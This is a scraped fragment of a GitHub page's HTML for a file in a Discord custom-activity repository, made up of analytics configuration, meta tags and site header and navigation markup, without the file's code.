&quot;20165800992&quot;, &quot;key&quot;: &quot;submit.upgrade_payment_form&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20171520319&quot;, &quot;key&quot;: &quot;submit.create_organization&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20222645674&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.discuss_your_needs&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20227443657&quot;, &quot;key&quot;: &quot;submit.verify_primary_user_email&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20234607160&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.try_enterprise&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20238175784&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.team&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20239847212&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.continue_free&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20251097193&quot;, &quot;key&quot;: &quot;recommended_plan&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20438619534&quot;, &quot;key&quot;: &quot;click.pricing_calculator.1_member&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20456699683&quot;, &quot;key&quot;: &quot;click.pricing_calculator.15_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20467868331&quot;, &quot;key&quot;: &quot;click.pricing_calculator.10_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20476267432&quot;, &quot;key&quot;: &quot;click.trial_days_remaining&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20476357660&quot;, &quot;key&quot;: &quot;click.discover_feature&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20479287901&quot;, &quot;key&quot;: &quot;click.pricing_calculator.custom_members&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20481107083&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_teacher_benefits&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20483089392&quot;, &quot;key&quot;: &quot;click.pricing_calculator.5_members&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20484283944&quot;, &quot;key&quot;: &quot;click.onboarding_task&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20484996281&quot;, &quot;key&quot;: &quot;click.recommended_plan_in_signup.apply_student_benefits&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20486713726&quot;, &quot;key&quot;: &quot;click.onboarding_task_breadcrumb&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20490791319&quot;, &quot;key&quot;: &quot;click.upgrade_to_enterprise&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20491786766&quot;, &quot;key&quot;: &quot;click.talk_to_us&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20494144087&quot;, &quot;key&quot;: &quot;click.dismiss_enterprise_trial&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20499722759&quot;, &quot;key&quot;: &quot;completed_all_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20500710104&quot;, &quot;key&quot;: &quot;completed_onboarding_tasks&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20513160672&quot;, &quot;key&quot;: &quot;click.read_doc&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20516196762&quot;, &quot;key&quot;: &quot;actions_enabled&quot;}, {&quot;experimentIds&quot;: [&quot;20479227424&quot;], &quot;id&quot;: &quot;20518980986&quot;, &quot;key&quot;: &quot;click.dismiss_trial_banner&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20535446721&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.dismiss_prompt&quot;}, {&quot;experimentIds&quot;: [&quot;20518037255&quot;], &quot;id&quot;: &quot;20557002247&quot;, &quot;key&quot;: &quot;click.issue_actions_prompt.setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20512531891&quot;], &quot;id&quot;: &quot;20595070227&quot;, &quot;key&quot;: &quot;click.pull_request_setup_workflow&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20626600314&quot;, &quot;key&quot;: &quot;click.seats_input&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20642310305&quot;, &quot;key&quot;: &quot;click.decrease_seats_number&quot;}, {&quot;experimentIds&quot;: [&quot;20619150105&quot;], &quot;id&quot;: &quot;20662990045&quot;, &quot;key&quot;: &quot;click.increase_seats_number&quot;}, {&quot;experimentIds&quot;: [], &quot;id&quot;: &quot;20679620969&quot;, &quot;key&quot;: &quot;click.public_product_roadmap&quot;}], &quot;revision&quot;: &quot;903&quot;}" /> <!-- To prevent page flashing, the optimizely JS needs to be loaded in the <head> tag before the DOM renders --> <script crossorigin="anonymous" defer="defer" integrity="sha512-0h1v+cT+vo2H4r2RIaHBoqggV4iI4Ah+a66PI4mUxhOkt3B7B/OeCMj80fIAb23CGQDCEYsVduIJfHChKLMFhw==" type="application/javascript" src="https://github.githubassets.com/assets/optimizely-d21d6ff9.js"></script> <meta name="hostname" content="github.com"> <meta name="user-login" content="Bomzz06"> <meta name="expected-hostname" content="github.com"> <meta name="js-proxy-site-detection-payload" content="YmM1ZWQ3YTU2YWQxZWUyNTM3YzRhMzM4M2MyODg5MzI0OWZiYmQxNmRhZTFhYmM5MTU1YzEwZGQ0YzZjNTRlMnx7InJlbW90ZV9hZGRyZXNzIjoiMTQwLjIxMy43LjE4NCIsInJlcXVlc3RfaWQiOiJBNDlGOjc4NTk6RDM5Njg6MTRGQUNEOjYxNUFFMjg1IiwidGltZXN0YW1wIjoxNjMzMzQ2MTgxLCJob3N0IjoiZ2l0aHViLmNvbSJ9"> <meta name="keyboard-shortcuts-preference" content="all"> <meta name="enabled-features" content="BRANCH_PROTECTION_RULE_WEBHOOK,MARKETPLACE_PENDING_INSTALLATIONS,FILE_UPLOAD_CURSOR_POSITION"> <meta http-equiv="x-pjax-version" content="c968ea42bc668fd66601e1b1178d236136ff381f20e8b8409d15e3dcd3c1c765"> <meta http-equiv="x-pjax-csp-version" content="8bb37f5b1649ef2bd79e9fefcbdd2cf21c1ba6315dbff4f9055455365d2daa86"> <meta http-equiv="x-pjax-css-version" content="b2fa4163e7018ea220c6ecc3a98eb4b79de0edb28e96ffba31345742dc34a9d7"> <meta http-equiv="x-pjax-js-version" content="b62840f36bdd7b926c395951e9aa0f266160de0281ac06d8cd24486348846c8e"> <meta name="go-import" content="github.com/agambajwa/discord-custom-activity git https://github.com/agambajwa/discord-custom-activity.git"> <meta name="octolytics-dimension-user_id" content="30459122" /><meta name="octolytics-dimension-user_login" content="agambajwa" /><meta name="octolytics-dimension-repository_id" content="298526344" /><meta name="octolytics-dimension-repository_nwo" content="agambajwa/discord-custom-activity" /><meta name="octolytics-dimension-repository_public" content="true" /><meta name="octolytics-dimension-repository_is_fork" content="false" /><meta name="octolytics-dimension-repository_network_root_id" content="298526344" /><meta name="octolytics-dimension-repository_network_root_nwo" content="agambajwa/discord-custom-activity" /> <link rel="canonical" href="https://github.com/agambajwa/discord-custom-activity/blob/master/app.py" data-pjax-transient> <meta name="browser-stats-url" content="https://api.github.com/_private/browser/stats"> <meta name="browser-errors-url" content="https://api.github.com/_private/browser/errors"> <meta name="browser-optimizely-client-errors-url" content="https://api.github.com/_private/browser/optimizely_client/errors"> <link rel="mask-icon" href="https://github.githubassets.com/pinned-octocat.svg" color="#000000"> <link rel="alternate icon" class="js-site-favicon" type="image/png" href="https://github.githubassets.com/favicons/favicon.png"> <link rel="icon" class="js-site-favicon" type="image/svg+xml" href="https://github.githubassets.com/favicons/favicon.svg"> <meta name="theme-color" content="#1e2327"> <meta name="color-scheme" content="light dark" /> <meta name="msapplication-TileImage" content="/windows-tile.png"> <meta name="msapplication-TileColor" content="#ffffff"> <link rel="manifest" href="/manifest.json" crossOrigin="use-credentials"> </head> <body class="logged-in env-production page-responsive page-blob" style="word-wrap: break-word;"> <div class="position-relative js-header-wrapper "> <a href="#start-of-content" class="p-3 color-bg-info-inverse color-text-white show-on-focus js-skip-to-content">Skip to content</a> <span data-view-component="true" class="progress-pjax-loader js-pjax-loader-bar Progress position-fixed width-full"> <span style="width: 0%;" data-view-component="true" class="Progress-item progress-pjax-loader-bar color-bg-info-inverse"></span> </span> <header class="Header js-details-container Details px-3 px-md-4 px-lg-5 flex-wrap flex-md-nowrap" role="banner" > <div class="Header-item mt-n1 mb-n1 d-none d-md-flex"> <a class="Header-link " href="https://github.com/" data-hotkey="g d" aria-label="Homepage " data-hydro-click="{&quot;event_type&quot;:&quot;analytics.event&quot;,&quot;payload&quot;:{&quot;category&quot;:&quot;Header&quot;,&quot;action&quot;:&quot;go to dashboard&quot;,&quot;label&quot;:&quot;icon:logo&quot;,&quot;originating_url&quot;:&quot;https://github.com/agambajwa/discord-custom-activity/blob/master/app.py&quot;,&quot;user_id&quot;:91737103}}" data-hydro-click-hmac="4caab5790c0a42a2267601624fa799518e43617bad147991e919699a43f0bf22" > <svg height="32" aria-hidden="true" viewBox="0 0 16 16" version="1.1" width="32" data-view-component="true" class="octicon octicon-mark-github v-align-middle"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path> </svg> </a> </div> <div class="Header-item d-md-none"> <button aria-label="Toggle navigation" aria-expanded="false" type="button" data-view-component="true" class="Header-link js-details-target btn-link"> <svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-three-bars"> <path fill-rule="evenodd" d="M1 2.75A.75.75 0 011.75 2h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 2.75zm0 5A.75.75 0 011.75 7h12.5a.75.75 0 110 1.5H1.75A.75.75 0 011 7.75zM1.75 12a.75.75 0 100 1.5h12.5a.75.75 0 100-1.5H1.75z"></path> </svg> </button> </div> <div class="Header-item Header-item--full flex-column flex-md-row width-full flex-order-2 flex-md-order-none mr-0 mr-md-3 mt-3 mt-md-0 Details-content--hidden-not-important d-md-flex"> <div class="header-search flex-auto js-site-search position-relative flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to" > <div class="position-relative"> <!-- '"` --><!-- </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="298526344" data-scoped-search-url="/agambajwa/discord-custom-activity/search" data-owner-scoped-search-url="/users/agambajwa/search" data-unscoped-search-url="/search" action="/agambajwa/discord-custom-activity/search" accept-charset="UTF-8" method="get"> <label class="form-control input-sm header-search-wrapper p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control input-sm header-search-input jump-to-field js-jump-to-field js-site-search-focus js-site-search-field is-clearable" data-hotkey=s,/ name="q" data-test-selector="nav-search-input" placeholder="Search or jump to…" data-unscoped-placeholder="Search or jump to…" data-scoped-placeholder="Search or jump to…" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search or jump to…" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" value="0TRNZE4AKSd7FDM4Jmb/6vBlsky+mAoILrfFfkkGXsFpeLxUCyLlu1AqgkfeyqWebEqpzzt6jMaWf/NsLwPdbw==" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg> <div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container"> <ul class="d-none js-jump-to-suggestions-template-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-suggestion" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="suggestion"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> </ul> <ul class="d-none js-jump-to-no-results-template-container"> <li class="d-flex flex-justify-center flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-text-secondary">No suggested jump to results</span> </li> </ul> <ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-container js-jump-to-suggestions-results-container"> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-owner-scoped-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="owner_scoped_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-start flex-items-center p-0 f5 navigation-item js-navigation-item js-jump-to-global-search d-none" role="option"> <a tabindex="-1" class="no-underline d-flex flex-auto flex-items-center jump-to-suggestions-path js-jump-to-suggestion-path js-navigation-open p-2" href="" data-item-type="global_search"> <div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.75 0 01-1.072 1.05A2.495 2.495 0 012 11.5v-9zm10.5-1V9h-8c-.356 0-.694.074-1 .208V2.5a1 1 0 011-1h8zM5 12.25v3.25a.25.25 0 00.4.2l1.45-1.087a.25.25 0 01.3 0L8.6 15.7a.25.25 0 00.4-.2v-3.25a.25.25 0 00-.25-.25h-3.5a.25.25 0 00-.25.25z"></path> </svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1.75a.25.25 0 01.25-.25h12.5a.25.25 0 01.25.25v12.5a.25.25 0 01-.25.25H1.75a.25.25 0 01-.25-.25V1.75zM11.75 3a.75.75 0 00-.75.75v7.5a.75.75 0 001.5 0v-7.5a.75.75 0 00-.75-.75zm-8.25.75a.75.75 0 011.5 0v5.5a.75.75 0 01-1.5 0v-5.5zM8 3a.75.75 0 00-.75.75v3.5a.75.75 0 001.5 0v-3.5A.75.75 0 008 3z"></path> </svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path> </svg> </div> <img class="avatar mr-2 flex-shrink-0 js-jump-to-suggestion-avatar d-none" alt="" aria-label="Team" src="" width="28" height="28"> <div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div> <div class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this repository"> In this repository </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All GitHub </span> <span aria-hidden="true" class="d-inline-block ml-1 v-align-middle">↵</span> </div> <div aria-hidden="true" class="border rounded-1 flex-shrink-0 color-bg-tertiary px-1 color-text-tertiary ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span class="d-inline-block ml-1 v-align-middle">↵</span> </div> </a> </li> <li class="d-flex flex-justify-center flex-items-center p-0 f5 js-jump-to-suggestion"> <svg style="box-sizing: content-box; color: var(--color-icon-primary);" width="32" height="32" viewBox="0 0 16 16" fill="none" data-view-component="true" class="m-3 anim-rotate"> <circle cx="8" cy="8" r="7" stroke="currentColor" stroke-opacity="0.25" stroke-width="2" vector-effect="non-scaling-stroke" /> <path d="M15 8a7.002 7.002 0 00-7-7" stroke="currentColor" stroke-width="2" stroke-linecap="round" vector-effect="non-scaling-stroke" /> </svg> </li> </ul> </div> </label> </form> </div> </div> <nav class="d-flex flex-column flex-md-row flex-self-stretch flex-md-self-auto" aria-label="Global"> <a class="Header-link py-md-3 d-block d-md-none py-2 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:dashboard:user" aria-label="Dashboard" href="/dashboard"> Dashboard </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g p" data-ga-click="Header, click, Nav menu - item:pulls context:user" aria-label="Pull requests you created" data-selected-links="/pulls /pulls/assigned /pulls/mentioned /pulls" href="/pulls"> Pull<span class="d-inline d-md-none d-lg-inline"> request</span>s </a> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-hotkey="g i" data-ga-click="Header, click, Nav menu - item:issues context:user" aria-label="Issues you created" data-selected-links="/issues /issues/assigned /issues/mentioned /issues" href="/issues"> Issues </a> <div class="d-flex position-relative"> <a class="js-selected-navigation-item Header-link flex-auto mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:marketplace context:user" data-octo-click="marketplace_click" data-octo-dimensions="location:nav_bar" data-selected-links=" /marketplace" href="/marketplace"> Marketplace </a> </div> <a class="js-selected-navigation-item Header-link mt-md-n3 mb-md-n3 py-2 py-md-3 mr-0 mr-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:explore" data-selected-links="/explore /trending /trending/developers /integrations /integrations/feature/code /integrations/feature/collaborate /integrations/feature/ship showcases showcases_search showcases_landing /explore" href="/explore"> Explore </a> <a class="js-selected-navigation-item Header-link d-block d-md-none py-2 py-md-3 border-top border-md-top-0 border-white-fade" data-ga-click="Header, click, Nav menu - item:workspaces context:user" data-selected-links="/codespaces /codespaces" href="/codespaces"> Codespaces </a> 